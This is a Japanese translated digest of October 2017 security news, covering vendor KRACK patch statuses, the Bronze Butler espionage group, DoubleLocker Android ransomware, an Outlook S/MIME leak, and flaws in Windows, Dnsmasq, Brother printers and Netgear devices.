     「Belkin, Linksys, Wemo(【訳注】 ベルキンが展開している三種類のブランド)は、WPA脆弱性を認識している。我々のセキュリティ チームは、詳細に検証している、そして、適切に勧告するだろう。我々は顧客ファーストであることを約束し、求めに応じられるよう、どのようにして顧客が製品をアップデートできるのかに関して、我々のセキュリティ・アドバイザリのページに指示を投稿することを計画していることを理解されたい。」

    Cisco
     Ciscoは、彼らの製品に関連する脆弱性を考察するアドバイザリと、脆弱性のある製品のリストをリリースした。Ciscoは、IOSとドライバ アップデートは開発中であり、リリースされるだろうと述べている。Cisco製品のユーザは、この先アップデートされる可能性があるので、頻繁にアドバイザリをチェックするようにアドバイスされている。

    DD-WRT
    KRACK用のパッチは、DD-WRT SVNに存在している。けれどもパッチされたファームウェアがダウンロード可能か否か、現在分かっていない。

    Debian
     Debianは、Krack脆弱性を解決するアップデートに関する情報付きのアドバイザリをDebian Security Announceメーリングリストに投稿している。

    Dell
    Dell広報担当は、彼らが積極的にこの脆弱性を調査しており、ここ数日中にアドバイザリをアップするだろうとBleepingComputerに告げている。

    Espressif
     Espressifは、ESP-IDF, ESP8266 RTOS SDK, ESP8266 NONOS SDK用のアップデートを彼らのGithubのページにリリースしている。

    Fedora
    Fedoraは、テストに利用できるFedora 25アップデートを持っている。Fedora 26Fedora 27アップデートは、安定版リリースへの追加待ちである。

    FreeBSD
     CERTによると、FreeBSDは、この脆弱性を認識しており、ユーザは、彼らのFreeBSD-Announceメーリングリストに参加するか、Security Informationページを監視するかの、どちらかをしなければならない。

    Fortinet
     このドキュメントによると、FortiAP 5.6.1が、KRACK脆弱性を修正したリリースである。

    Google
     Android 6.0以降は、現在この攻撃に対して脆弱性がある。BleepingComputerがGoogleに接触した時、彼らのステートメントは、「我々は問題を認識している、そして、我々は、来週影響を受ける全てのデバイスにパッチするだろう」というものであった。今のところ、Google WiFiに関連した利用可能な情報はない。

    Intel
    Intelは、アドバイザリをリリースした。これには、アップデートされたドライバへのリンクが含まれている。

    Lede
     Ledeは、「テストが完了すると直ちにLEDE 17.1.4としてリリースされるだろう」と述べている。OpenWRTに関しては何も発言していない。

    LineageOS
     LineageOSは、Krack脆弱性を防御するために統合されたパッチを持っている。

    Linux
     脆弱性リリースによると、「我々の取り組みは、Linuxで一般的に使用されているWi-Fiクライアントwpa_supplicanのバージョン2.4以降に対して特に壊滅的である。」 パッチはコチラで発見できる。

    Meraki
     アップデートは、KRACK脆弱性を解決するCisco Meraki用にリリースされた。多くの情報は、このアドバイザリ(802.11r Vulnerability (CVE: 2017-13082) FAQ)に発見される。

    Microchip Technology
     Microchipは、利用可能なアップデート付きのアドバイザリを投稿した。

    Microsoft
    Microsoftは、10月の定例のパッチ(Patch Tuesday)でKRACK脆弱性をコッソリ修正していた。

    MikroTik
     MikroTikによると、「RouterOS v6.39.3, v6.40.4, v6.41rcは影響を受けない! APモードデバイスは影響を受けない。実装された全ての修正は、ステーションとWDSモードにのみ言及される。」 彼らは更に、ファームウェアバージョンは、この問題を修正するために先週リリースされたと述べている。

    Netgear
    Netgearは、KRACKの影響を受ける製品リストと関連するアップデートを含むアドバイザリをリリースしている。

    OpenBSD
    OpenBSDは、この脆弱性を静かにアップデートし修正するパッチを提供している。詳細な情報は、コチラコチラで読むことができる。

    Open-MeshとCloudTrax
     アドバイザリは、Krack脆弱性に関連したOpen-MeshとCloudTraxに関して投稿された。アップデートは、10月17日までに自動アップデートを使用して、これらの全てに対して配布されることが予定されている。アドバイザリに詳細。

    pfSense
     pfSense(FreeBSDをベースにしている)は、FreeBSDの修正をインポートするためのを始めた。

    Qualcomm
    Qualcomm広報担当は、BleepingComputerに以下のように告げている。

     「頑強なセキュリティとプライバシーをサポートするテクノロジを提供することは、Qualcomm Technologies, Inc.にとって最重要である。我々は、Qualcomm-powered製品中で再使用されるWPAパケットナンバーを改善するために、オープンソースセキュリティ問題を持つ全てのインプレメンテーションを同定し解決するために産業パートナーと共同作業している。この問題のパッチは、Code Aurora Forumと、他のディストリビューション チャンネルで現在利用可能であるし、追加のパッチは、我々の品質保証プロセスで検証されると、直ちにポストされる。」

    Red Hat
     Red Hatは、wpa_supplicant中の脆弱性に関するアドバイザリを作成している。利用できる更なる詳細は存在していない。

    Sierra Wireless
     Sierra Wirelessは、影響を受ける製品と改善計画に関するテクニカル・ブレティンをポストしている。CERTからのリンク。

    Sonicwall
     Sonicwall技術サポートは、KRACKに関するアドバイスを直ぐにアップすることを希望しているとBleepingComputerに告げている。

    Sophos
     Sophosは、アドバイザリをリリースし、Sophos UTM Wireless, Sophos Firewall Wireless, Sophos Central Wireless, Cyberoam Wireless製品が、Krack脆弱性の影響を受けると述べている。これらの製品のアップデートは直ぐにリリースされるだろう。

    Synology
    Synologyは、WiFiドングルに接続されているSynology DiskStation Manager (DSM)と、Synology Router Manager (SRM)が、KRACKに対する脆弱性があることを表明するアドバイザリをポストしている。Synologyによると、影響を受ける製品用のアップデートは直ぐにリリースされる。

    東芝
     CERTによると、東芝のワイアレスLANアダプタの付いたSureMark 4610 Printer (型番 1NR, 2CR, 2NR)と、Canvio AeroMobileワイアレスSSD製品が影響を受ける。東芝は、プリンタに関しては、所有者とビジネスパートナーに直接接触することにしている。そして、ワイアレスSSDカードに関しては、ファームウェア アップデートが行われる。

    TP-Link
     私がTP-Linkの技術サポートに接触した時、「我々の上席は、この問題に目を光らせている。現在、我々は、TP-Linkの製品が、この影響を受けたという如何なるフィードバックも受けとってていない。我々が、何らかの新しい情報を入手したなら、我々の公式のWebサイトでアップデートを提供する」と、告げてきた。

    Turris Omnia
    OpenWRTを使用しているTurrisは、彼らのフォーラムに、パッチは彼らが修正をテストしリリースする予定のレポジトリに追加されたと投稿している。願わくば、これが、同様に早急にOpenWRTのアップデートのリリースを導かんことを。

    Ubiquiti
     Ubiquitiは、UAP/USW用に、WPA2 KRACK脆弱性を解決するファームウェア バージョン3.9.3.7537をリリースしている。

    Ubuntu
     Ubuntuは、この問題を解決するために、wpa_supplicantとhostapdをアップデートする方法に関する情報の付属するアドバイザリをリリースしている。

    WatchGuard
    WatchGuardは、彼らの様々な製品とサービスに関して、アップデートが利用可能になる時期を含むアドバイザリをリリースしている。

    WiFi Allianceの告知
     WiFi Allianceは、KRACK脆弱性に関する告知をリリースしている。

    Zyxel
     Zyxelは、どの製品が影響を受けるのかを詳らかにするページを作成している。彼らは、この脆弱性を修正するための作業中であるが、利用可能はドライバやファームウェアのアップデートは存在していない。

    KRACKの影響を受けないと主張する企業

    Arista Networks, Inc.
    Lenovo
    Vmware

    情報提供をしていない企業

    Juniper Networks
    3com Inc
    Actiontec
    Alcatel-Lucent
    AsusTek Computer Inc.
    Atheros Communications, Inc.
    Barracuda Networks
    Broadcom
    CentOS
    D-Link Systems, Inc.
    Edimax
    EMC Corporation
    Extreme Networks
    F5 Networks, Inc.
    Foundry Brocade
    Hewlett Packard Enterprise
    IBM, INC.
    Kyocera Communications
    Marvell Semiconductor
    MediaTek


    サイバースパイ グループが日本企業に対するキャンペーンをセットアップ
    Kaspersky : ThreatPost (2017/10/14)
     研究者達は、サイバースパイ グループBronze Butlerについて詳細を確認中である。このギャングは、2012年以来、日本の重工業をターゲットにし続けている(このグループの現在の手口については、あまり知られていない)。
     SecureWorks(Dell Technologiesの子会社)のCounter Threat Unitによって木曜日にリリースされたレポートで、研究者達は、今までで最も完全なこのグループ(Tick(ダニ)として知られる)の絵を描いている。
     「ここ12ヶ月、(SecureWorks)は、Bronze Butler脅威グループによって様々な日本の組織に実行された幾つかの侵入を調査した。このグループの活動は、少くとも2012年以降大部分は検出されていなかったが、多分、長く活動していた」と、Threatpostのインタビューで、SecureWorksの上級セキュリティ研究員Matthew Websterは、発言している。
     その発端以来、SecureWorksは、Bronze Butlerが中華人民共和国から作動していたと確信している。このグループは、重大なインフラストラクチャ、重工業、製造及び国際関係に関連する日本企業から知的財産と他の機密データを抜き取ることを主眼としていた。
     今週リリースされたレポートにおいて、SecureWorksは、このグループによって使用された戦術及び戦略の推移を明らかにした。研究者によると、ユニークなマルウェアツールを開発するために、0-Dayの悪用を思いつくと、Bronze Butlerは、その知識と経験を増強し、日本のシステム管理者によって使用されるデスクトップ管理ツールを悪用することで益々効果的にしてきていた。
     Bronze Butlerについて何か知っているか? 多分中国に存在し、日本をターゲットにしていることに加えて、研究者は、このグループが、スピアフィッシング(【訳注】 特定の人物を狙い、偽のメールを送ったりウイルスを仕込んだりしてパスワードや個人情報などを詐取する詐欺(IT用語辞典より))、戦略的Web改竄(【訳注】 攻撃者は、標的にした組織や企業に侵入するために必要な「戦略的な情報」を収集します。この段階の収集方法は、軍事上の偵察活動に例えることができます。収集された情報には「標的にした組織のメンバーや企業の社員たちがどのようなサイトを「信頼できるサイト」として頻繁に閲覧しているか」といった見解などが含まれています。こうした情報に基づいて改ざん対象のWebサイトを選定する過程は、初期には「戦略的Web改ざん」とも呼ばれていました(Trend Microセキュリティ情報より))、ターゲットのシステムに侵入するために0-Dayの脆弱性を利用していた。
     「このグループは、マルウェアをダウンロードし実行(カスタマイズ)するためにFlashアニメーション添付ファイルの付いたフィッシングeMailを使用し、戦略的Web改竄攻撃にFlash脆弱性攻撃を活用していた」と、研究者は記述している。
     SecureWorksによると、日本の組織への幾つかの侵入を調査している時、SecureWorksは、Bronze Butlerが、SKYSEA Client View(【訳注】 企業・団体における情報漏洩対策の徹底と、IT運用管理を支援する(Sky株式会社Webサイトより))と呼ばれる日本の企業に人気のあるデスクトップ管理ツール中にAdobe Flashの0-Dayの脆弱性を悪用していることを発見した。
     「この脅威グループが、人気のある地域的IT製品中の脆弱性を発見し武器化できるという事実は、このグループの能力と、犠牲者たる彼らのターゲットを成功裡にセキュリティ侵害するための確固たる献身に対する更なる理解を与える」と、Websterは発言している。
     SecureWorksは、Bronze Butlerが、このグループ専用のプロプライエタリ・マルウェアツールを開発し配備する ための習熟度を持っていると発言している。これらのツールの一つは、Daserfと呼ばれるマルウェアである。このマルウェアは、コマンドを実行するために、データをアップロードしたりダウンロードしたりするために、スクリーンショットをキャプチャするために、キーストロークをログするために、敵対者にリモートシェルを与えるバックドアとして機能するものである。
     このグループは、時間の経過と共にこのツールの二つのバージョンを開発したようである。2016年、このグループは、Daserfの使用からxxmmとDatperと呼ばれる二つのリモートアクセス・トロイ(RATS)にシフトしたかのようであると、Websterは発言している。

    Palo Alto NetworksのUnit 42で7月24日に公開されたレポートよると、Bronze ButlerのDaserfマルウェアは、類似のバックドアMinzenだけでなくGh0st RATやダウンローダーHomamDownloaderと共謀し9002 RATとして特定されるRATと共に共有インフラを監視していた。
     意図としては、Bronze Butlerは、重要なビジネスと販売関連情報をほぼ例外なくターゲットにしていた。比較すると程度は低いが、Bronze Butlerはまた、ビジネスと販売関連情報と連動したネットワークやシステム設定ファイルも追いかけている。
     このレポートによると、「知的財産、製品の詳細、企業情報に主眼を置くことは、このグループは、彼らが信じている情報が競合他社に価値があるかもしれないと考えていることを示唆している。」 研究者は、Bronze Butlerのターゲットの多様化は、様々なグループリーダーが、そのグループに複数の目標の実行を課していることを示唆していると追加している。
     このグループの活動の範囲は、おそらくまだ完全には実現されていないので、我々は、依然としてBronze Butlerが活発であり、脅威の状況の大変有能なコンポーネントであると評価している」とWebsterは発言している。


    Android用の身代金要求型マルウェアDoubleLockerは、データを暗号化しPINを変更する
    The Register : Security (2017/10/13)
     悪党共は、ユーザのデータを暗号化すると共に、PINを変更することでセキュリティ侵害したデバイスから犠牲者を締め出すAndroid用の身代金要求型マルウェアの株を考えだした。
     DoubleLockerは、小狡い感染メカニズムと、犠牲者から金銭を強請り取る二つの強力なツールを結合している。
     「そのペイロードは、犠牲者がそのデバイスにアクセスすることを妨げるために、そのデバイスのPINを変更し、そして、犠牲者のデータを暗号化する」と、「このような組み合わせは、Androidの系では、今迄確認されていない」と、Lukas Stefanko(DoubleLockerを発見したセキュリティ企業ESETのマルウェア研究者)は、発言している。  「DoubleLockerは、Androidのユーザ補助サービス(accessibility service)を悪用している。そして、これはサイバー犯罪者の間では人気のトリックである。」
     この汚らわしい物は、バンキング・トロイをベースにしている。これは、アカウント改竄機能を簡単に追加できることを意味している。
     このAndroid用マルウェアは、その親株であるPC版と、まさに同じ方法(セキュリティ侵害されたWebサイトを介して押し付ける、インチキのAdobe Flash Playerのアップデート)で拡散している。
     稼働すると、このアプリケーションは、"Google Play Service"と名付けられた、このマルウェアのユーザ補助サービスのアクティベーションを要求する。このマルウェアが、アクセス許可を取得すると、デバイスの管理者権限をアクティベートするために、これらのアクセス許可を使用し、このマルウェア自体をDefaultのホームアプリケーションに設定する。両方共にユーザの同意なしに実行される。
     「それ自体をDefaultのホームアプリケーション(ランチャ。【訳注】 電源を入れた時に表示される画面を作り出しているアプリケーション)に設定することは、マルウェアの永続性を改善するトリックである」と、「ユーザがホームボタンをクリックするたびに、この身代金要求型マルウェアはアクティベートされ、そのデバイスは再びロックされる。ユーザ補助サービスを使用することで、ホームボタンを押すことによって、マルウェアを起動していることをユーザに認識されなくてすむ」と、Stefankoは発言している。
     セキュリティ侵害されたデバイスに植え付けられたDoubleLockerは、犠牲者に支払いを求める二つの理由を作成する。一つ目、犠牲者にそのデバイスの使用を実際上できなくするために、そのデバイスのPINを変更する。二つ目、DoubleLockerは、そのデバイスのプライマリ・ストレージ・ディレクトリの全てのファイルを、AES暗号化アルゴリズムを使用して暗号化する。

    DoubleLockerの脅迫状

     この身代金額は、比較的穏当な 0.0130 Bitcoin(凡そ 54$(概ね6000円))に設定されている。DoubleLockerの非ルートデバイスをクリーンにする唯一の実行可能なオプションは、工場出荷状態にリセットすることである。ルートデバイスのPINロックを回避することは、簡単ではないが可能である。暗号化されたファイルは簡単に復元することはできない。


    Outlookは、S/MIME暗号化を使用すると、eMailを暗号化しないかもしれない
    BleepingComputer : News>Security (2017/10/11)
     S/MIME規格で暗号化した安全なeMailを送信するために、Outlookを活用しているユーザは、Outlookのバグにより、それらのeMailの内容がリークされる可能性がある。
     この問題は、Outlookが暗号化と非暗号化の両方の形式でeMailを送信していることにある。eMailトラフィックをスヌーピングすることができる攻撃者は、これらのeMailの内容を読むことができるかもしれない。
     このバグは一般的な問題ではないが、以下で説明される特定のシナリオの下でのみ現れる。

    ・ S/MIME公開鍵暗号化基準で暗号化されたeMailだけが影響を受ける。PGP/GPGは、影響を受けない。
    ・ 暗号化されたeMailのリークは、Outlookを使用して送信されたeMailのみに発生する。Outlookで受信した場合ではない。
    ・ このリークは、plaintext(平文)で送信されたOutlook eMailにのみ発生する。DefaultのOutlook設定は、HTMLフォーマットを使用している。
    ・ リークは、ユーザがplaintext(平文)eMailに対する返信を暗号化しようとした時にも発生する。Outlookは、そのようなeMailに返信するとき、DefaultのHTMLフォーマットを、自動的にplaintext(平文)に変更する
    ・ このリークは、ユーザが、SMTPサーバでOutlookを利用している場合には、常に発生する。
    ・ このリークは、Microsoft Exchangeインフラストラクチャを使用しているOutlookクライアント用の一つのサーバーホップ(【訳注】 ホップ数: 目的のサーバーに接続するために、プロバイダーのルーターなどを経由していく数(ASCII.JPデジタル用語辞典より))にだけ発生する。これは、暗号化されたeMailのリークを企業ネットワーク内部に制限する。TLSは、eMail通信に関しては無効化されざるを得ない。
    ・ リークはまた、受信者のeMailクライアントでも発生する。eMailクライアントは、eMailメッセージのプレビューを表示するので、たとえ攻撃者が、標的の秘密鍵へのアクセスを持っていない場合でさえ、攻撃者は、暗号化されたメッセージの内容を閲覧することができる。例えば、犠牲者のeMailパスワード(犠牲者のS/MIME秘密鍵ではない)へのアクセスを取得した攻撃者は、犠牲者が受け取った暗号化されたメッセージ(リークしやすいOutlookを実行しているユーザによって送信された)の一部を読むことができる。

     たとえ、上述のシナリオに限定された場合でさえ、暗号化リークは重要な問題である。企業は、重要な情報をeMailで交換するとき、この情報を守るために暗号化を使用する。殆どのバグと脆弱性の報告も、暗号化されたフォーマットで処理されている。

    Microsoftは、真の影響について口を閉ざしている

     SEC Consultの研究者は、今年前半、偶然にOutlook S/MIME暗号化eMailのリークを発見した。他のユーザも、一ヶ月後、Microsoftのフォーラムに同じ問題を通知した
     研究者達は、彼らが、この問題に関してMicrosoftに接触し、Microsoftは、このバグ(CVE-2017-11776)に関する修正を、昨日の2017年10月のPatch Tuesdayでリリースしたと、発言している。
     Microsoftは、Outlookのどのバージョンが、この問題の影響を受けるのか、今迄にリリースされたOutlookの全てのバージョンが、このバグの影響を受けるのか、それとも、SEC Consultがこの問題を発見した2017年5月以降にリリースされたバージョンだけなのか、明らかにしていない。
     差し当たり、CVE-2017-11776悪用のシナリオに該当する企業は、Outlookクライアントをアップデートし、その後、危険に晒されるようなeMailを、S/MIME-encryptedを介して送信するように、全ての情報を処理すべきである。


    Microsoftは、コッソリWindows 10のセキュリティホールを修正したが、Windows 7,8は、寒空の下に放置されている
    The Register : Security (2017/10/06)
     MicrosoftはコッソリWindows 10のセキュリティバグをパッチしているが、Windows 7, 8に対しては同じアップデートを即座にリリースしていない。潜在的に、数億のコンピュータに攻撃のリスクが残されている。
     ハッカーとマルウェアによって悪用可能なフローと他のプログラミングの大失態は、Windows 10のビッグ・リリース(Anniversary UpdateやCreators Updateのような)で一掃され修正された。しかし、この重要な修復作業は、たとえ、Windows 7とWindows 8への月例のソフトウェア・アップデートで撤回していたとしても、あまりに緩慢である。
     これは全て、Googleの優秀なProject Zeroチームによるものである。恐ろしいのは、Windowのパブリック・ビルドを比較している悪党共が、Windows 10でコッソリ修正されたこれらの脆弱性に気が付き、この同じセキュリティホールをWindowsの今までのバージョン(これらは依然として世界中の家庭と企業で使用されている)中に存在していることを認識され、システムに感染し、人々をスパイするために、このバグが悪用されることである。ハッカーがこれを認識していなかったとしても、Googleの職員が、この問題に関してブログで公開したので、彼らは今、認識するだろう。
     Microsoftの技術者は、Windows 10オペレーティングシステム中のコンポーネントを改善する努力の一部として、これらWindowsのセキュリティホールをコッソリ解決している。例えば、或るチームは、カーネル中のメモリ管理を改善するための仕事をしている、結果として、彼らは、一塊のソースコードを書き直す(途中であらゆる厄介な攻撃可能なバグを潰し、ソフトウェアのパフォーマンスは向上させるために)。マーケティングの部署に関しては、これは、ローディング・タイムの高速化を自慢できる素晴らしいニュースである。一方、マルウェア開発者は、Windows 8、7に依然として存在するプログラミングの大失態を発見したら、祝うことができる。
     「Microsoftは、最も最近のWindowsプラットフォームにのみ、構造的セキュリティ改善の数値導入や、時々、通常のバグでさえ修正することが知られている」と、Google Project Zeroの研究者Mateusz Jurczykは、火曜日に語っている。
     更に、「これは、今までのシステムのユーザに対してセキュリティの誤った感覚を作成し、Windowsの異なるバージョン中で対応するコードの僅かな変更に焦点を当てることで、簡単に検出可能なソフトウェア・フローに対して、それらのシステムを脆弱性があるまま放置する」と、付け加えている。
     問題の一例として、Jurczykは、カーネル中でのmemset()の不安定な使用に焦点を当てている。これは、メモリの特定領域中のバイトを特定の値(0のような)で上書きすることを前提としている関数であり、それ故、メモリのその部分に今まで格納されていたものが何であれ取り去る。
     このカーネルが、NtGdiGetGlyphOutlineシステムコールを介して、情報でメモリ領域を満たすようにアプリケーションによって、それを、そのアプリケーションのメモリスペースにコピーするように命令された時、このOSは、コピー操作に先立って、memset()を使用するための領域を完全に上書きしない。これは、残っているプライベートなカーネルデータをアプリケーションのメモリスペースにコピーして終了することを意味している。それ故、あってはならない情報のリークが起こる。これは、OSや他のプログラムをスヌーピングするのには役に立つ。あるいは、より大きなダメージを与える脆弱性攻撃をやり通すために、システムの内部オペレーションの仕組みを十分に獲得するのに役に立つ。
     この情報公開されたバグは、Windows 10では修正されたが、今年5月の終わりにProject ZeroがMicrosoftに通知するまでWindows 7とWindows 8.1では残ったままになっていた。そして、9月にWindows 7とWindows 8.1用のパッチで修正された。Googleは、公開する前に、開発者と企業に行動を起こさせるために、一般的に、通知されたセキュリティ上の欠点を解決するために90日の猶予をベンダ(Microsoftを含む)に与えている。
     Windowsの以前のバージョンへのパッチの配備に関する数カ月のタイムラグは、攻撃に対してシステムを脆弱なままにしていた。Windows 10のセキュリティ防御を広汎にアップグレードすることで、Microsoftは、ハッカーが今までのバージョン中で悪用できる弱点の発見をより簡単にしている。
     「顧客の一部を攻撃に晒したままにしているだけでなく、どのような攻撃ベクトルかも明らかにする、これはユーザセキュリティに真っ向から対立するものである」と、Jurczykは説明している。
     「これは、カーネルメモリ公開や、追加されたmemsetコールのような、明らかな修正にあたるバグ・クラスに当て嵌まる」
     ベンダがメジャー・アップデートを持続することを、以前のソフトウェア・バージョン(Windowsユーザの半分程度が、Windows 7, 8を依然として稼働している)へのパッチを無期限に作成してくれることを期待するのは現実的ではない。これは、皮肉なことに、数百万の人々が、Windows 10のセキュリティ改善によってリスクのある状態に置かれていることを意味している。
     Windows 8.1は、2013年1月10日まで、Windows 7は、2020年1月14日まで、定例のセキュリティ・フィックスを受け取るとされている。
     「Windowsは、通知されたセキュリティ問題を調査し、可能な限り早急に影響を受けるデバイスを率先してアップデートするという顧客に対する責任を持っている」と、MicrosoftのスポークスマンははThe Registerに告げている。
     「更に、我々は継続的に多重防御セキュリティに投資している。そして、顧客にWindows 10と、最高の防御のためにMicrosoft Edgeブラウザの使用を推奨している。」
     (【訳者補注】 このMicrosoftの発言を)翻訳: 「どうか、どうか、どうか、Windows 7, 8の使用を止めてください。」


    Dnsmasq脆弱性はホーム・ルータとIoTデバイスを危険に晒している
    Bitdefender : BOX (2017/10/06)
     Googleの脆弱性研究者達は、インターネットに接続されるデバイスで実行されるコード中に、悪用可能なソフトウェアのフローを明らかにした。このフローは、遠隔から彼らが選択した任意のコードを実行することをハッカーに可能にするものである。
     このDnsmasqネットワーク・サービス・ソフトウェア(設定が簡単なことと、リソースに対する影響が少ないことから人気がある)は、一般的に多種多様なシステム(Linuxディストリビューション、ホームルータ、IoTデバイスを含む)にプレインストールされている。
     月曜日に公開されたブログポストに於いて、Googleの研究者は、通常のインターネットセキュリティ検証を行っている間に、Dnsmasq中に「7つの異なる問題」を発見したと説明している。

     このフローの一つは、"trivial-to-exploit"(悪用するには些細な)DHCPベースのバッファオーバーフロー脆弱性として説明されているが、他の情報漏洩用の脆弱性攻撃と結合することで、システムの防御をバイパスし、リモートコード実行を獲得できる。
     簡潔に、攻撃者は、脆弱性のあるデバイス上で悪意あるコードを実行し、彼ら独自の目的のためにそのデバイスを乗っ取るために、このフローを悪用することができる。我々が過去に何度も見てきたように、悪意あるハッカーは、 DDoS攻撃のような犯罪行為を支援し、セキュリティ保護が不十分なIoTデバイスの制御を掴むことが、いとも簡単であることを理解している。
     特定の場合においては、攻撃者は、脆弱性のあるデバイスを悪用するために、通常より多少工夫する必要があるかもしれないが、それでも、あなたは、実行しているネットワーク中に、リスクのあるデバイスを存在させたくないでしょ?
     Shodanでの検索は、現在Dnsmasqサービスを実行してインターネットに接続しているデバイスが凡そ110万台あることを明らかにしている。
     Googleの研究チームは、問題の重大性が認識された後、彼らは修正版を作成するためにDnsmasqのメンテナ達と共同作業した。この修正版は既にバージョン2.78としてリリースされており、10月のAndroidの月例セキュリティアップデートにも含まれている。
     私の懸念は、製造メーカの一部がIoTデバイスとルータを大変低価格で販売し、ちっぽけなマージンを得ていることにある。結果として、これらのメーカは、彼らのユーザベースに対しパッチを開発しリリースすることに何のインセンティブも感じていないだろう。例え、あらゆるアップデートに関わるインフラが、実際に利用可能であったとしても。
     いつものように、アップデートに関してあなたのファームウェア製造メーカーに煩く言うようにしなさい、もしくは、そのような会社の製品を買うか否かによって自身の考えを表明することを考慮しなさい(最新の脆弱性に対して、あなたのIoTデバイスをパッチし続けようとしないこのようなメーカをボイコットするために)。 


    数百のプリンターがバックエンド・パネルとパスワード・リセット機能をオンラインに晒している
    BleepingComputer : News>Security (2017/10/05)
     セキュリティ研究者は、凡そ700のブラザーのプリンターがオンラインに晒されたままになっていることを発見した。これは、何を探したらいいのかを認識している者なら誰もがパスワード・リセット機能にアクセスすることを可能にするものである。
     NewSky Securityの主幹研究員Ankit Anubhavによって発見されたこれらのプリンタは、インターネットを介して、それらの管理パネルへの完全なアクセスを提供する。
     Anubhavは、Bleeping Computerに対して発覚したプリンタのリストを提供した。幾つかのURLに無作為にアクセスすることによって、Bleeping Computerは、広汎なブラザーのプリンタモデル(2~3例を上げると、DCP-9020CDW, MFC-9340CDW, MFC-L2700DW, MFC-J2510のような)を発見した。
     幾つかあるこれら露出の発生原因の一つは、管理パスワード無しにプリンタを出荷したブラザーの選択である。殆どの組織は、十中八九、管理パネルが広汎な接続に対して開いていることを理解せずに、彼らのプリンタをネットワークに接続している。これらのプリンタは、ShodanやCensysのようなIoT検索エンジンを介して、今や簡単に発見可能である。

    研究者は影響を受ける組織に通知することを計画している

     「私は大変多くの知名度の高い大学がこのリストに含まれていることに驚いている」と、AnubhavはBleeping Computerとの個人的な会話の中で発言している。
     大学以外でも、企業ネットワークや政府ネットワークと疑われるものにも、幾つかのプリンタが存在している。
     「私は同僚と共に、組織に連絡し通知することを計画している」と、Anubhavは発言している。
     Bleeping Computerもまた、仲間の研究者Victor Geversに、このリストを転送した。Geversは、GDI Foundation(脆弱性、マルウェア、他のサイバー脅威によって影響を受ける組織に通知することに特化した非営利団体)の議長である。
     「我々は可及的速やかに、このリストを処理するだろう」と、Geversは本日早朝Bleeping Computerに告げてきた。

    管理パネルを広汎に開きっぱなしにするインターネットの脅威

     昨日、Virus Bulletin 2017セキュリティ・カンファレンスで、雑誌Virus Bulletinの編集者Martijn Grootenは、セキュリティ実行者は、リスクを明確に伝える責任を持っていると発言している。
     インターネットに接続されるプリンタを持つことに関して正当な使用の場合もあるが、我々は、Mr. Grootenでさえ、プリンタの管理パネルをパスワード無しに露出したままにすることに対してアドバイスするであろうことを確信している。
     例えば、攻撃者はプリンタのパスワードを変更することができるし、影響を受ける組織に対して停止時間を発生させることができる。

    ブラザーのプリンタの管理パネル

    ファームウェア攻撃は簡単である

     AnubhavがBleeping Computerに提供したリストは、ブラザープリンタのパスワード・リセット・セクション固有の"password.html"ファイルを露出するデバイスだけしか含んでいない。一部のこれらプリンタ用のパネルはまた、ファームウェアアップデートの検証とトリガーのためのオプションを含んでいる。
     通常のスマート・デバイス(【訳注】 パソコンやメインフレーム、ワークステーションなどの既存のコンピュータの枠にとらわれない情報機器の総称。明確な定義はない(Wikipediaより))に関しては、ファームウェア アップデート プロセスが、攻撃者に、そのプロセスを乗っ取られ、汚れたファームウェアを配布される可能性のある脆弱性を含んでいた場合でさえ、この攻撃は、認証されていない攻撃者の、そのページヘのアクセスをブロックすることによって、しばしば緩和される。
     プリンタ管理パネルを広範囲にわたってオンラインに晒すことは、この防御を削除することになる。攻撃者は汚れたファームウェアをアップデートするように挙動するスパイウェアのようなものを含めることができ、攻撃者のサーバに印刷されたドキュメントのコピーを送信することができる。
     民間企業と政府組織の場合、これは非常に重要な情報を晒される可能性がある。
     この戦いは、NewSkyとGDI研究者が、可能な限り多数の影響を受ける組織に通知することにかかっている。
     ブラザーのプリンターを稼働している組織は、そのプリンタが、Defaultで、オンラインに管理パネルを晒すか否か、そしてまた、そのデバイスへの非認証アクセスを妨げるためのカスタム・パスワードを設定できるか否か、検証しなければならない。


    NetGearがルータ、スイッチ、NASデバイス中の50の脆弱性を修正
    Kaspersky : ThreatPost (2017/10/02)
     Netgearは最近、ルータ、スイッチ、NASデバイス、ワイアレス・アクセスポイントに関して、リモートコード実行から認証バイパスフローに至るまでの脆弱性を解決する50のパッチをリリースした。
     このパッチの内の20は、「高」と評価される脆弱性問題を、残りの「中」と評価されるセキュリティリスクと共に解決している。Netgearは、このバグに関するアドバイザリを、この二週間に渡り彼らのWebサイトに投稿している。
     Netgearは、ネットワーク・セキュリティ企業Beyond Securityが、先週パッチされた脆弱性の内の一部を発見していたことを認めている。この問題の一つは、1.4.3-17(x86)と1.1.4-7(ARM)以前のバージョンを実行しているReadyNAS Surveillanceアプリケーション中のコマンド・インジェクション脆弱性であった。コマンド・インジェクション攻撃は、ホスト・オペレーティングシステム上で、システム・シェルにデータ(フォーム、クッキー、HTTPヘッダ)を提供する危険なユーザの通過を促進するものであり、脆弱性あるアプリケーションを介して任意のコマンドを実行できる。
     「これらは全て、ユーザインプットの不十分な認証、認証すべきかすべきでないかということに関する見落とし、彼らの製品Webインターフェースにアクセスしているユーザに関して執行するセキュリティの不適切なメカニズムのようなことによって発生した脆弱性である」と、「私は、Netgear製品の多くが同じコードベースと同じ基底コード構造を共有しているので、彼らの製品の多くに脆弱性が発生するのだと確信している」とBeyond Securityの設立者兼最高経営責任者Noam Rathausは発言している。
     Beyond Securityは更に、Trustwaveの研究者Martin Rakhmanovと、ON-X Securityの研究者Maxime Peterlinが、Netgear製品中の脆弱性を発見していたこともまた認められたと追加している。
     「報道されたこの問題の一部は、大変深刻である」とRakhmanovは発言している。これらの脆弱性の一つ(PSV-2017-1209)は、コマンドインジェクション・セキュリティ脆弱性であり、脆弱性のあるファームウェアを実行中の17の消費者向けルータに関連している。
     「この脆弱性は、このルータの完全制御を任意のローカルユーザに可能にするものである」と、続けて「幸いにも、『リモート管理権限』はDefaultでONになっていないが、もしも手動でこれをONにすると、インターネット上の全ての者に対して、このルータを脆弱にする」と、Rakhmanovは発言している。
     Netgearは、先週公開された脆弱性とパッチの殆どは、この会社のバグバウンティ・プログラム(Bugcrowdとのパートナーシップで一月に起動した)を介して通知されたと、Threatpostに告げている。開始以来、この会社は、このプログラムを介して幾つかの公開を行ってきた(今年初めに報道された数十万台のNetgearルータに発見されたパスワード・バイパスのバグを含む)。
     公開のつい最近のウェーブでは、ProSAFE M4300 Intelligent EdgeシリーズのスイッチのようなIoTアプリケーションで使用されるネットワーキング・ギアから、消費者向けグレードNetgear D6400ワイアレスルータに至るまでの範囲の製品に影響を与えている。
